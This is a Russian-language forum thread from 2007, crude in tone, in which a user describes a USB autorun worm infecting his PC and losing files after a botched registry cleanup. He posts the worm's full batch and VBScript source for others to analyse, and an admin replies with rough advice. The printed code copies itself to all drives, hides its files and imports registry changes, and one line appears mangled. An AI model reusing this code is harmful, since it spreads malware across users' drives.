|
Жопно-Сортирный Форум Срать - естественная потребность. Срите сколько вылезет
|
|
Предыдущая тема :: Следующая тема |
Автор |
Сообщение |
Armalon Длинный модератор
Зарегистрирован: 18.03.2007 Сообщения: 344
|
Добавлено: Вс Апр 29, 2007 22:46 Заголовок сообщения: Потеря важных файлов |
|
|
Произошел этот злополучный день вчера. Но ему (как в любых "трагедиях") предшевствовала серия маловероятных событий, который одновременно произошли. Позавчера, в мое отсутствие, зашел знакомый дабы перенести работу в Photoshop к себе на флешку. Перенес и ушел. Возвратившись домой я заметил одну неприятную особенность. Каждый жестки диск открывался в новом окне, что было неприятно, но не фатально. На следующий день (вчера) к сестре зашла подруга дабы скопировать на свою флешку отсканированный материал. Все бы ничего, да флешка у нее оказалась сумасбродная. Всякий раз когда ее вставляли она вызывала свою программу с менюшками и прочей хренью, что для флешки совсем не необходимо и даже мешает и раздражает! И приспичило же мне отучить флешку это делать. Полез смотреть в ней системные файлы и обнаружыл несколько autorun файлов с разными расширениями. Затем обнаружил такие же у себя на двух жестких дисках. Вредная программа, которую принес знакомый сестры позавчера была подобием вируса. Она прописывалась в автозапуск всех дисков, что найдет. На флешку, на харды и даже сволочь прописалась на мобильный телефон! Полез я в ее код (он скриповый, отрывок я выложу), обнаружил куда она лезет и что где изменыет и решил ее отладить это делать, а потом удалить сами файлы. Но вышло так, что по своей неопытности я затер одну ветку в реестре и компьютер при загрузке из Приветствия через несколько секунд снова уходил в приветствие. Ничего не помогло, пришлось переустанавливать виндовс. А так как на диске, где лежит винда я хранил много нужных файлов, то они были потеряны из-за того, что NC не может воспринимать длинные пути к файлам, содержащие русские буквы. Увы и ах, я потерял любимую музыку, а так же файл, в котором хранил много любимых анекдотов.
Целая серия событий, которые повлекли это:
1) у меня небыло нового антивируса
2) знакомый сестры занес вирус
3) я полез рытся в флешке подруги сестры
4) я удалил именно ту ветку реестра, из за которой полетела винда
5) NC не смог скопировать файлы, так как они имели длинный путь и хранились в "Моих документах"
А самое главное что по сути это все мелочи, все это ерунда, все это не стоит ничего. Музыку найду снова и в этом поиске обрету что-то новое. Анекдоты смешны тогда, когда их забываешь, а тебе потом другие люди их рассказывают. Переустановил винду, есть надежда, что она будет работать стабильнее.
Вот код скриптового вируса:
файл autorun.bat
Код: |
@echo off
rem autorun·з±©
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit
if exist %SYSTEMROOT%\system32\autorun.bin type %SYSTEMROOT%\system32\autorun.bin >c:\autorun.txt&&exit
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end
|
файл autorun.vbs
Код: |
rem autorun·з±©
on error resume next
Set WshShell =CreateObject("WScript.Shell")
if Year(Date)=2030 and Month(Date)=6 and Day(Date)=30 then
a=WshShell.Run("autorun.bat Over" ,0,True)
Set Of = CreateObject("Scripting.FileSystemObject")
Set fc = Of.OpenTextFile("C:\autorun.txt", 1)
mt = fc.ReadAll
fc.Close
if mt<then>2030 or Month(Date)>100 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.*",d&"\",True
else
Of.CopyFile "autorun.*",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.*",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if
function decrypt(dcode)
dim texts
dim i
for i=1 to len(dcode)-4
x=i mod 5
texts=texts & chr(asc(mid(dcode,i,1))-x)
next
decrypt=texts
end function
|
Предлагаю спецам разобрать. забавно что программа смотрит на системную дату и что-то делает при этом.
К программе еще прилагается иконка, exe файл, reg файл, inf файл.
Еще эта зараза любит скрывать системные файлы, даже когда в винде стоят настройки их показывать. |
|
Вернуться к началу |
|
|
bee Админ c яйцами
Зарегистрирован: 18.03.2007 Сообщения: 727 Откуда: Из жопы
|
Добавлено: Вс Апр 29, 2007 23:51 Заголовок сообщения: |
|
|
Лонг, ты мудак:
-надо создавать логические диски
(винда на отдельном разделе должна быть)
-Когда переустанавливаешь винду, файл не херятся
(нехуй форматировать)
-Нахуй переустанавливать, когда можно обновить винду
-Антивирус надо обновлять
-Всякую скриптовую хуйню на хард не кидать
-Нехуй делить ветки реестра
-Анегдоты надо к Green--Snake топик было кидать, а не в рыло
читать и ржать
Кстати, файлы с длинными именами сами переименовываются в досе
(типа BORLAN~1 - это Borland Pascal v7.0)
З.Ы. Код: | if Year(Date)=2030 and Month(Date)=6 and Day(Date)=30 then
a=WshShell.Run("autorun.bat Over" ,0,True) |
Щас не 2030 год, ато бы BATник запустился бы и тада тебе точно пиздец _________________ Хер, шлибы нах !!!
Последний раз редактировалось: bee (Пн Апр 30, 2007 0:34), всего редактировалось 2 раз(а) |
|
Вернуться к началу |
|
|
Armalon Длинный модератор
Зарегистрирован: 18.03.2007 Сообщения: 344
|
Добавлено: Пн Апр 30, 2007 0:26 Заголовок сообщения: |
|
|
Я мудак, я этого не отрицаю, но ты тоже мудак:
- У меня два харда, на одном винда, на другом файлы. Просто некоторые временно хранились на харде с виндой.
- Поверх винда не хотелась ставится, а удалять ее ис под доса - охуеть сколько мороки.
- Я наверно тупой, надо было тебе звонить.
- Не люблю вообще антивирусы.
- Я не кидал, она сама от флешки перекинулась.
- Один подраздел дельнул в котором прога прописалась.
- Слижком много анекдотов за раз - не смешно. Я их коллекционировал.
Мне хотелось поставить системную дату на это число и посмотреть что будет))) |
|
Вернуться к началу |
|
|
|
|
Вы не можете начинать темы Вы не можете отвечать на сообщения Вы не можете редактировать свои сообщения Вы не можете удалять свои сообщения Вы не можете голосовать в опросах
|
|